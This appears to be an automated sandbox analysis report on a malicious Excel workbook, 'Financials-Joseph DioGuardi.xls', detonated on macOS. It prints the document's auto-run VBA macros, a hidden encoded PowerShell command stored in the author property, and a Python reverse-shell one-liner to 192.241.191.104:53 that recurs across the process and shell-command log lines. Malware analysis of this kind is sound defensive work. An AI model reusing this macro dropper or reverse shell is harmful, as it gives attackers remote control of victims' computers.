Source: /Applications/Microsoft Excel.app/Contents/MacOS/Microsoft Excel (PID: 502) | Reads from socket in process: |
Source: /bin/sh (PID: 513) | Reads from socket in process: |
Source: /Applications/Microsoft Excel.app/Contents/SharedSupport/Office365ServiceV2.app/Contents/MacOS/Office365ServiceV2 (PID: 506) | Reads from socket in process: |
Source: /Applications/Microsoft Excel.app/Contents/MacOS/Microsoft Excel (PID: 502) | Writes from socket in process: |
Source: /bin/sh (PID: 513) | Writes from socket in process: |
Source: /Applications/Microsoft Excel.app/Contents/SharedSupport/Office365ServiceV2.app/Contents/MacOS/Office365ServiceV2 (PID: 506) | Writes from socket in process: |
Source: global traffic | TCP traffic: 192.168.0.50:5353 -> 224.0.0.251:5353 |
Source: global traffic | TCP traffic: 192.168.0.50:49225 -> 192.241.191.104:53 |
Source: /bin/sh | Python command: sh -c python -c 'import urllib2,socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(('192.241.191.104',53)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(['/bin/sh','-i']) ' & |
Source: /Library/Frameworks/Python.framework/Versions/2.7/bin/python | Python command: python -c import urllib2,socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(('192.241.191.104',53)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(['/bin/sh','-i']) |
Source: /Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python | Python command: /Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python -c import urllib2,socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(('192.241.191.104',53)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(['/bin/sh','-i']) |
Source: /Applications/Microsoft Excel.app/Contents/MacOS/Microsoft Excel (PID: 502) | Random device file read: /dev/random |
Source: /Applications/Microsoft Excel.app/Contents/MacOS/Microsoft Excel (PID: 502) | Random device file read: /dev/urandom |
Source: /Applications/Microsoft Excel.app/Contents/MacOS/Microsoft Excel (PID: 502) | Random device file read: /dev/random |
Source: /Applications/Microsoft Excel.app/Contents/MacOS/Microsoft Excel (PID: 502) | Random device file read: /dev/random |
Source: /Applications/Microsoft Excel.app/Contents/MacOS/Microsoft Excel (PID: 502) | Random device file read: /dev/random |
Source: /Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 512) | Random device file read: /dev/urandom |
Source: /Applications/Microsoft Excel.app/Contents/SharedSupport/Office365ServiceV2.app/Contents/MacOS/Office365ServiceV2 (PID: 506) | Random device file read: /dev/random |
Source: /Applications/Microsoft Excel.app/Contents/SharedSupport/Office365ServiceV2.app/Contents/MacOS/Office365ServiceV2 (PID: 506) | Random device file read: /dev/random |
Source: /Applications/Microsoft Excel.app/Contents/SharedSupport/Office365ServiceV2.app/Contents/MacOS/Office365ServiceV2 (PID: 506) | Random device file read: /dev/urandom |
Source: /Applications/Microsoft Excel.app/Contents/SharedSupport/Office365ServiceV2.app/Contents/MacOS/Office365ServiceV2 (PID: 506) | Random device file read: /dev/random |
Source: /Applications/Microsoft Excel.app/Contents/MacOS/Microsoft Excel (PID: 502) | AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist |
Source: /Applications/Microsoft Excel.app/Contents/SharedSupport/Office365ServiceV2.app/Contents/MacOS/Office365ServiceV2 (PID: 506) | AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist |
Source: /Library/Frameworks/Python.framework/Versions/2.7/bin/python (PID: 512) | Python framework application: /Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python |
Source: /Applications/Microsoft Excel.app/Contents/MacOS/Microsoft Excel (PID: 502) | Binary plist file created: /private/var/folders/rz/z4lzdb9n2yg9fdd643nf823w0000gn/T/com.microsoft.Excel/TemporaryItems/(A Document Being Saved By Excel)/ci.plist |
Source: /Applications/Microsoft Excel.app/Contents/MacOS/Microsoft Excel (PID: 502) | XML plist file created: /private/var/folders/rz/z4lzdb9n2yg9fdd643nf823w0000gn/T/com.microsoft.Excel/TemporaryItems/(A Document Being Saved By Excel)/com.microsoft.officeprefs.plist |
Source: /Applications/Microsoft Excel.app/Contents/MacOS/Microsoft Excel (PID: 502) | XML plist file created: /private/var/folders/rz/z4lzdb9n2yg9fdd643nf823w0000gn/T/com.microsoft.Excel/TemporaryItems/(A Document Being Saved By Excel)/com.microsoft.Excel.securebookmarks.plist |
Source: /Applications/Microsoft Excel.app/Contents/SharedSupport/Office365ServiceV2.app/Contents/MacOS/Office365ServiceV2 (PID: 506) | Binary plist file created: /private/var/folders/rz/z4lzdb9n2yg9fdd643nf823w0000gn/T/com.microsoft.Office365ServiceV2/TemporaryItems/(A Document Being Saved By Office365ServiceV2)/ci.plist |
Source: /Applications/Microsoft Excel.app/Contents/MacOS/Microsoft Excel (PID: 511) | Shell command executed: sh -c python -c 'import urllib2,socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(('192.241.191.104',53)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(['/bin/sh','-i']) ' & |
Source: /Applications/Microsoft Excel.app/Contents/MacOS/Microsoft Excel (PID: 502) | AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist |
Source: /Applications/Microsoft Excel.app/Contents/MacOS/Microsoft Excel (PID: 502) | AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist |
Source: /Applications/Microsoft Excel.app/Contents/MacOS/Microsoft Excel (PID: 502) | AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist |
Source: /Applications/Microsoft Excel.app/Contents/MacOS/Microsoft Excel (PID: 502) | AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist |
Source: /Applications/Microsoft Excel.app/Contents/MacOS/Microsoft Excel (PID: 511) | Office executable: /bin/sh |
Source: classification engine | Classification label: mal72.evad.expl.troj.macXLS@0/51@0/0 |
Source: Financials-Joseph DioGuardi.xls | OLE indicator, Workbook stream: true |
Source: Financials-Joseph DioGuardi.xls | OLE, VBA macro line: ps = activeworkbook.builtindocumentproperties("author").value |
Source: Financials-Joseph DioGuardi.xls | OLE document summary: author value length >= 200: powershell -window hidden -EncodedCommand JAB3AHMAZQBYACAAPQAgACcAJABVAGYAagAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQB |
Source: Financials-Joseph DioGuardi.xls | OLE indicator, VBA macros: true |
Source: Financials-Joseph DioGuardi.xls | OLE document summary: author value: powershell -window hidden -EncodedCommand JAB3AHMAZQBYACAAPQAgACcAJABVAGYAagAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAK |
Source: Financials-Joseph DioGuardi.xls | OLE, VBA macro line: Sub Auto_Open() | |
Source: Financials-Joseph DioGuardi.xls | OLE, VBA macro line: Sub AutoOpen() | |
Source: Financials-Joseph DioGuardi.xls | OLE, VBA macro line: Call winshell | |
Source: Financials-Joseph DioGuardi.xls | OLE, VBA macro line: Call winshell | |
Source: Financials-Joseph DioGuardi.xls | OLE, VBA macro line: Function winshell() As Object | |
Source: Financials-Joseph DioGuardi.xls | OLE, VBA macro line: ' get / execute powershell command from doc property | |
Source: Financials-Joseph DioGuardi.xls | OLE, VBA macro line: Set Obj = CreateObject("WScript.Shell") | |
Source: Financials-Joseph DioGuardi.xls | OLE, VBA macro line: Obj.Run ps, 0 | |
Source: Financials-Joseph DioGuardi.xls | OLE, VBA macro line: ' winshell failed, try macshell | |
Source: Financials-Joseph DioGuardi.xls | OLE, VBA macro line: macshell | |
Source: Financials-Joseph DioGuardi.xls | OLE, VBA macro line: Function macshell() | |
Source: Financials-Joseph DioGuardi.xls | OLE, VBA macro line: scriptToRun = "do shell script ""python -c 'import urllib2,socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect((\""192.241.191.104\"",53)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\""/bin/sh\"",\""-i\""]);' &""" | |
Source: Financials-Joseph DioGuardi.xls | OLE, VBA macro line: Set Obj = CreateObject("WScript.Shell") | |
Source: Financials-Joseph DioGuardi.xls | OLE, VBA macro line: Set Obj = CreateObject("WScript.Shell") | |
Source: /Applications/Microsoft Excel.app/Contents/MacOS/Microsoft Excel (PID: 502) | System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist |
Source: /Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 512) | System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist |
Source: /Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 512) | System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist |
Source: /Applications/Microsoft Excel.app/Contents/SharedSupport/Office365ServiceV2.app/Contents/MacOS/Office365ServiceV2 (PID: 506) | System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist |
Source: /Applications/Microsoft Excel.app/Contents/MacOS/Microsoft Excel (PID: 502) | Sysctl read request: hw.availcpu (6.25) |
Source: /Applications/Microsoft Excel.app/Contents/MacOS/Microsoft Excel (PID: 502) | Sysctl read request: hw.ncpu (6.3) |
Source: /Applications/Microsoft Excel.app/Contents/MacOS/Microsoft Excel (PID: 502) | Sysctl read request: hw.cpu_freq (6.15) |
Source: /Applications/Microsoft Excel.app/Contents/SharedSupport/Office365ServiceV2.app/Contents/MacOS/Office365ServiceV2 (PID: 506) | Sysctl read request: hw.availcpu (6.25) |
Source: /Applications/Microsoft Excel.app/Contents/SharedSupport/Office365ServiceV2.app/Contents/MacOS/Office365ServiceV2 (PID: 506) | Sysctl read request: hw.ncpu (6.3) |
Source: /Applications/Microsoft Excel.app/Contents/MacOS/Microsoft Excel (PID: 502) | Sysctl read request: kern.osversion (1.65) |
Source: /Applications/Microsoft Excel.app/Contents/MacOS/Microsoft Excel (PID: 502) | Sysctl requested: kern.ostype (1.1) |
Source: /Applications/Microsoft Excel.app/Contents/MacOS/Microsoft Excel (PID: 502) | Sysctl requested: kern.osrelease (1.2) |
Source: /Applications/Microsoft Excel.app/Contents/MacOS/Microsoft Excel (PID: 502) | Sysctl requested: kern.hostname (1.10) |
Source: /bin/sh (PID: 511) | Sysctl requested: kern.hostname (1.10) |
Source: /bin/sh (PID: 513) | Sysctl requested: kern.hostname (1.10) |